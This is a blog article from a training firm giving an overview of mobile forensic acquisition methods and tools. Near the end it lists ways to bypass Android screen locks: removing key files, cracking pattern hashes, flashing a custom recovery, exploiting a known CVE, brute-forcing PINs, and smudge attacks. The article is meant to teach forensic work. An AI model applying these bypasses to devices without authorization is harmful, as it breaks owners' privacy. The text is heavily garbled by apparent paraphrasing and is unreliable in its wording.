The article Mobile Forensic Overview considers different aspects associated with this subject, like methodologies, phases of the method and therefore the complications inherent therein. When carrying it out, bearing in mind first and foremost the phases of acquisition and analysis of the evidence, it’s necessary to understand a good range of methods, techniques and tools also because the criteria necessary for having the ability to guage the suitability of using one versus another. during this article we’ll address these issues.
Broadly speaking there are 3 different methods of extracting evidence: physical acquisition, logical acquisition and filing system acquisition.
• Physical acquisition: this is often commonly the foremost used method. It consists of creating a uniform replica of the first , thereby preserving all potential evidence. This procedure has the advantage of it being possible to look for deleted elements. Its main disadvantage is its complexity compared to the opposite methods and therefore the time that it takes to hold it out.
• Logical acquisition: this consists in making a replica of the objects stored on the device. This makes use of the mechanisms implemented natively by the manufacturer, that is, people who are normally wont to synchronise the terminal with a computer in order that the specified information is requested from the mobile device’s OS . it’s the advantage of being a way simpler process than the previous one, although it doesn’t allow an excellent amount of data to be accessed.
• File system acquisition: this enables all visible files to be obtained through the filing system , which doesn’t include deleted files or hidden partitions. counting on the sort of investigation, it’s going to be sufficient to use this method, which is a smaller amount complex than physical acquisition. to hold it out we employ the mechanisms integrated within the OS to repeat the files, Android Device Bridge (ADB) for Android. Through this method, it’s possible to recover certain deleted information since some operating systems like Android and iOS employ a structure that uses SQLite databases to store much of the knowledge . during this way, when file records are deleted, they’re only marked as available to be overwritten and, as such, they temporarily remain available, and it’s therefore possible to recover them.
When it involves selecting the foremost suitable method, many aspects are taken under consideration , such as: the extent of thoroughness required, the deadline for completing the method , which sort of data it’s necessary to obtain: volatile information, previously deleted information, information from third party applications, etc.
Another more practical method which will be useful when choosing the foremost suitable/possible way of acquiring evidence is that the following diagram, during which account is taken of various aspects like whether the USB debugging is activated, whether the terminal is locked or if there’s access, etc.
Also Read : Challenges of Mobile Forensic
Below, we’ll present a series of tools that are very useful for extracting information:
General free tools
• AFLogical OSE – Open source Android Forensics app and framework is an application in APK format that has got to be installed beforehand within the Android terminal. Once the method is completed it allows varied information to be extracted to the SD card (call log, contact list and list of applications installed, text messages and multimedia), which must subsequently be recovered either by connecting the cardboard to an external device or through the ADB.
• Open Source Android Forensics may be a framework that’s distributed via a virtual machine image that brings together various tools which permit the analysis of applications for mobile devices, including both a static and a dynamic analysis or maybe a forensic analysis.
• Andriller is an application for Windows operating systems that brings together different forensic utilities. It allows tons of interesting information to be obtained that’s related, amongst others, both to social media and to messaging programmes (Skype, Tinder, Viber, WhatsApp, etc.).
• FTK Imager Lite allows us to figure with memory dumps of mobile devices to analyse them and acquire evidence.
• Now Secure Forensics Community Edition is distributed as a reflection that brings together various tools to hold out a forensic analysis, and may perform differing types of evidence extraction or maybe file carving in its commercial version.
• LIME- Linux Memory Extractor is software that permits a volatile memory dump to be obtained from a Linux-based device, as is that the case for Android phones. Likewise, it’s the advantage that it are often executed remotely via a network.
Specific free Tools
• Android Data Extractor Lite (ADEL) may be a tool developed in Python that permits a forensic flowchart to be obtained from the databases of the mobile device. to hold out the method , it’s necessary for the mobile device to be rooted or have personalised recovery installed.
• WhatsApp Xtract allows WhatsApp conversations to be viewed on the pc during a simple and user-friendly way. As such, the various databases that store information like messages should be obtained beforehand.
• Skype Xtractor is an application, supported both on Windows and Linux that permits us to look at information of the Skype main.db file, which stores information about contacts, chats, calls, transferred files, deleted messages etc.
Paid tools
• Cellebrite Touch is one among the foremost well-known and complete evidence extraction devices. It allows us to figure with over 6,300 different terminals with the most mobile operating systems. it’s also very simple and intuitive.
• Encase Forensics, additionally to Cellebrite, may be a worldwide reference in forensic analysis. Its wide selection of features includes that which identifies encrypted files which which attempts to decipher them through Passware Kit Forensic, a tool that comes with specific algorithms for this purpose.
• Oxygen Forensic Suite is capable of obtaining information from quite 10,000 different mobile device models and even obtaining information from services on the cloud and import backups or images.
• MOBILedit! Forensic allows tons of data to be received and advanced operations to be administered like obtaining an entire memory dump, avoiding terminal-locking measures, and flexibly creating reports.
• Elcomsoft iOS Forensic Toolkit allows for physical acquisition on iOS devices like iPhone, iPad or iPod. It also includes other utility features like that of deciphering the keychain that stores user passwords within the terminal analysed or registering each action that’s performed during the entire process to stay a record of them.
To carry out the evidence-gathering process in an Android mobile device, many of the tools require enabling of the “USB debugging” option, preferably the “Stay awake” option and disabling of any time-out screen lock option. within the event that the terminal has any screen lock option configured, it’s necessary to bypass it.
Most of the tools described above, mainly paid tools, include mechanisms to bypass these protections so it’s only necessary to follow the steps that they indicate, although this is often not always possible.
If the method goes to be administered manually, one or more of the subsequent actions need to be performed:
- If the device is rooted we will attempt to remove the gesture.key or password.key enter accordance with the mode of protection established, which are stored in /data/system/ or copy them and decipher the pattern through a hash dictionary, like AndroidGestureSHA1, employing a tool like Android Pattern Lock Cracker for this.
- Install a personalised recovery like ClockWorkMod or Team Win Recovery Project (TWRP)and subsequently deactivate device access locking.
- The problem of fragmentation on mobile platforms causes the overwhelming majority of devices to be affected with vulnerabilities which will not be resolved for these models and, as such, counting on the Android version, it’s possible to use a number of them to obtain access to the device, like CVE-2013-6271.
Using brute force. - When a 4-digit pin is employed as a security measure it’s been demonstrated that it’s possible to get it during a short period of your time , in around a maximum period of 16 hours.
- A more sophisticated technique could even be used, as was demonstrated by various members of the IT department of the University of Pennsylvania in what they called a Smudge Attack, which consists of obtaining the locking pattern from fingerprints on the screen of the mobile device, using photographs from different angles for this purpose, modifying the properties of sunshine and colour.
Topic Related Questions
This Blog Article is posted by
Infosavvy, 2nd Floor, Sai Niketan, Chandavalkar Road Opp. Gora Gandhi Hotel, Above Jumbo King, beside Speakwell Institute, Borivali West, Mumbai, Maharashtra 400092
Contact us – www.info-savvy.com
